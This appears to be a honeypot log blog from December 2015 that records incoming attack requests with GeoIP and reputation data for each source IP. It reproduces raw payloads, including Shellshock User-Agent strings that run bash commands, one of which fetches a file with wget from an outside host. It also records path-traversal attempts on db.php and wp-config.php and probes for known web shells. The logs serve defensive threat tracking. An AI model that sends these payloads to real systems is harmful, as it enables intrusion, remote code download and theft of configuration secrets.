Saturday, 12 December 2015

173.193.232.34 - Shellshock code execution

BEGIN OF HTTP DATA:
2015-12-11 21:44:55
Source IP: 173.193.232.34
GET //cgi-bin/finger.cgi HTTP/1.1
Accept: */*
User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | md5sum"
GET //cgi-bin/test.cgi HTTP/1.1
GET //cgi-mod/index.cgi HTTP/1.1
GET //cgi-sys/defaultwebpage.cgi HTTP/1.1
GET //cgi-sys/entropysearch.cgi HTTP/1.1
GET //cgi-sys/realsignup.cgi HTTP/1.1
GET //cgi-bin/test-cgi HTTP/1.1
GET //cgi-bin/finger.cgi HTTP/1.1

173.193.232[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36351 SoftLayer Technologies Inc.

Wednesday, 9 December 2015

14.141.81.22 - multiple *.jsp GET attempts

BEGIN OF HTTP DATA:
2015-12-08 16:48:30
Source IP: 14.141.81.22
User-Agent: Wget/1.11.4 Red Hat modified
Accept: */*
GET /zmeu/zmeu.jsp HTTP/1.0
GET /iddqd/iddqd.jsp HTTP/1.0
GET /iesvc/iesvc.jsp HTTP/1.0
GET /wstats/wstats.jsp HTTP/1.0
GET /zecmd/zecmd.jsp HTTP/1.0
GET /idsvc/idsvc.jsp HTTP/1.0
GET /wincfg/wincfg.jsp HTTP/1.0


14.141.81[.]22

    Static Source: GeoIP data
  • Country: India
  • ASN: AS4755 TATA Communications formerly VSNL is Leading ISP
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/14.141.81.22

207.200.40.116 - GET db.php

BEGIN OF HTTP DATA:
2015-12-09 01:17:38
Source IP: 207.200.40.116
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.10-1ubuntu3.10
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

207.200.40[.]116

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS3728 Onramp Access Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/207.200.40.116

69.12.70.34 - GET db.php

BEGIN OF HTTP DATA:
2015-12-08 20:48:58
Source IP: 69.12.70.34
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

69.12.70[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS8100 QuadraNet, Inc
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/69.12.70.34
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.12.70.34

Sunday, 6 December 2015

103.238.131.21 - access attempt on wp-config.php (traversal)

BEGIN OF HTTP DATA:
2015-12-06 01:42:29
Source IP: 103.238.131.21
GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
Host: 195.169.125.87
Connection: close


 END OF DATA

103.238.131[.]21

    Static Source: GeoIP data
  • Country: Australia
  • ASN: AS23352 Server Central Network
remarks:        This address range is in use by an agile cloud hosting environment.

Saturday, 5 December 2015

1.32.103.224 - Shellshock download via http://lliillii.altervista.org

BEGIN OF HTTP DATA:
2015-12-05 02:52:29
Source IP: 1.32.103.224
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

 END OF DATA
The server was not responding to my manual download attempt.

1.32.103[.]224

    Static Source: GeoIP data
  • Country: Malaysia
  • ASN: AS4788 TM Net, Internet Service Provider
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/1.32.103.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/1.32.103.224